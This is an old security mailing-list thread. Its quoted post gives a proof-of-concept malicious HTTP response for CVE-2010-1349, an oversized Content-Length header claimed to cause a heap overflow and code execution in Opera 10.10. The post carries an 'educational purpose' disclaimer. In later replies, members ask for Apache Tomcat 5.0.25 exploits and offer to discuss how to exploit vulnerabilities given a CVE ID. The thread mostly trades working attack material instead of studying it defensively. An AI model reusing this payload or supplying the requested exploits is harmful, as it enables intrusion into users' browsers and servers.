Re: [NForceIT] Re: [NforceIT] Opera 10.10 Overflow and Remote Code Execution

Wed, 12 May 2010 00:20:56 -0700 

iam not able to find the the cve id for apache tomcat. we r getting only
vulnerabilities,(browser based exploits), but  iam using backtrak for petest
and exploit. if u know any php, python, perl,ruby exploits.

Thanks
infosecworld

On Wed, May 12, 2010 at 8:18 AM, N41K <[email protected]> wrote:

> Hi Srinivas,
>
> I think CVE List or other Public List are places where you can Find
> for any kind of Exploits information for any Target.
> But, further exploiting the vulnerability after getting the CVE can
> happen.
> Just share us with the CVE ID or any Relative information, we can
> discuss how to exploit it.
>
> Regards,
> 0xN41K
>
> On May 11, 7:06 pm, "Srinivas.Burra" <[email protected]> wrote:
> > Hi guys,
> >
> > Anybody having Apache/tomcat 5.0.25 exploits, if any one know please
> post.
> >
> > Thanks in Advance
> > Infosec
> >
> >
> >
> >
> >
> > On Sun, May 9, 2010 at 7:27 PM, N41K <[email protected]> wrote:
> >
> > > Reference:CVE-2010-1349
> >
> > > "Integer overflow in Opera 10.10 allows remote attackers to execute
> > > arbitrary code via a large Content-Length value, which triggers a heap
> > > overflow."
> >
> > > Find the Below Exploit details:
> > > If an Sever will respond with the following details the Exploit gets
> > > triggered and can extend up to arbitrary code execution and results
> > > Heap Overflow.
> >
> > > HTTP Response Header:
> >
> > > 'HTTP/1.1 200 ok'."\r\n".
> > > 'Transfer-Encoding: identity'."\r\n".
> > > 'Date: sat 09 may 2010 12:4:33 gmt'."\r\n".
> > > 'Server: servertest'."\r\n".
> > > 'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
> > > 'Content-Location: file://C:/boot.ini'."\r\n".
> > > 'Vary:negotiate,accept-language,accept-charset'."\r\n".
> > > 'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
> > > 'Accept-Ranges: bytes'."\r\n".
> > > 'Cache-Control: max-age=0'."\r\n".
> > > 'Expires: fri, 28 feb 2010 18:31:20 gmt'."\r\n".
> > > 'Content-Encoding: identity'."\r\n".
> > > 'Content-Length:
> >
> > >
> 777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­777777777777777777777777777777777777777777777777777777777777777777777777777­7777777777777777777777777777777777777777666'."\r
> > > \n".
> > > 'Via: 1.1 website:1008 (squid/2.7.stable6)'."\r\n".
> > > 'Keep-Alive: timeout=15, max=300'."\r\n".
> > > 'Connection: keep-alive'."\r\n".
> > > 'Content-Type: text/html; charset=iso-8859-2'."\r\n".
> > > 'Allow: GET,HEAD'."\r\n".
> > > 'Content-Range: bytes 21010-47021/47022'."\r\n".
> > > 'Content-Language: pl'.
> >
> > > *** Please dont try this code for FUN . This is STRICTLY for
> > > educational Purpose.
> >
> > > Regards,
> > > 0xN41K
> >
> > > --
> > > You received this message because you are subscribed to the Google
> Groups
> > > "nforceit" group.
> > > To post to this group, send an email to [email protected].
> > > To unsubscribe from this group, send email to
> > > [email protected]<nforceit%[email protected]>
> <nforceit%[email protected]­om>
> > > .
> > > For more options, visit this group at
> > >http://groups.google.com/group/nforceit?hl=en-GB.
> >
> > --
> > You received this message because you are subscribed to the Google Groups
> "nforceit" group.
> > To post to this group, send an email to [email protected].
> > To unsubscribe from this group, send email to
> [email protected]<nforceit%[email protected]>
> .
> > For more options, visit this group athttp://
> groups.google.com/group/nforceit?hl=en-GB.- Hide quoted text -
> >
> > - Show quoted text -
>
> --
> You received this message because you are subscribed to the Google Groups
> "nforceit" group.
> To post to this group, send an email to [email protected].
> To unsubscribe from this group, send email to
> [email protected]<nforceit%[email protected]>
> .
> For more options, visit this group at
> http://groups.google.com/group/nforceit?hl=en-GB.
>
>

-- 
You received this message because you are subscribed to the Google Groups 
"nforceit" group.
To post to this group, send an email to [email protected].
To unsubscribe from this group, send email to 
[email protected].
For more options, visit this group at 
http://groups.google.com/group/nforceit?hl=en-GB.

Reply via email to